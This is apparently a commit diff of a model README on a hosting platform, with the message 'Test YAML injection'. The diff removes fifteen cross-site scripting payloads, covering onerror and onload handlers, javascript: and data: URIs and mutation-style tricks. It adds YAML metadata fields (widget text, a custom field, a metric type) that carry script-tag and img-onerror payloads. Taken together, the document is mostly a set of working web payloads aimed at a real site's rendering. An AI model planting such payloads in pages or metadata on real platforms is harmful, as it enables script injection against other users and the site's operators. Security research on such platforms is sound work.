FIRSTACCOUNT69 commited on
Commit
24a154f
·
verified ·
1 Parent(s): 8f6bb0e

Test YAML injection

Browse files
Files changed (1) hide show
  1. README.md +17 -31
README.md CHANGED
@@ -1,35 +1,21 @@
1
  ---
2
- title: XSS Test
 
 
 
 
 
 
 
 
 
 
 
 
 
 
3
  ---
4
 
5
- # Security Testing
6
 
7
- Test 1: <img src=x onerror=alert(document.domain)>
8
-
9
- Test 2: <svg/onload=alert(1)>
10
-
11
- Test 3: <details open ontoggle=alert(1)><summary>Click</summary>content</details>
12
-
13
- Test 4: <math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>
14
-
15
- Test 5: <a href="data:text/html,<script>alert(1)</script>">click</a>
16
-
17
- Test 6: <marquee onstart=alert(1)>
18
-
19
- Test 7: <input onfocus=alert(1) autofocus>
20
-
21
- Test 8: <video><source onerror=alert(1)>
22
-
23
- Test 9: <body onload=alert(1)>
24
-
25
- Test 10: <div style="width:expression(alert(1))">
26
-
27
- Test 11: <object data="javascript:alert(1)">
28
-
29
- Test 12: <embed src="javascript:alert(1)">
30
-
31
- Test 13: <base href="javascript:alert(1)//">
32
-
33
- Test 14: <link rel=import href="data:text/html,<script>alert(1)</script>">
34
-
35
- Test 15: <meta http-equiv=refresh content="0;url=javascript:alert(1)">
 
1
  ---
2
+ license: mit
3
+ tags:
4
+ - text-generation
5
+ widget:
6
+ - text: "<img src=x onerror=alert(1)>"
7
+ custom_field: "</script><script>alert(1)</script>"
8
+ model-index:
9
+ - name: test
10
+ results:
11
+ - task:
12
+ type: text-generation
13
+ metrics:
14
+ - name: test
15
+ type: "<script>alert(1)</script>"
16
+ value: 0.5
17
  ---
18
 
19
+ # Test Model
20
 
21
+ Normal content here.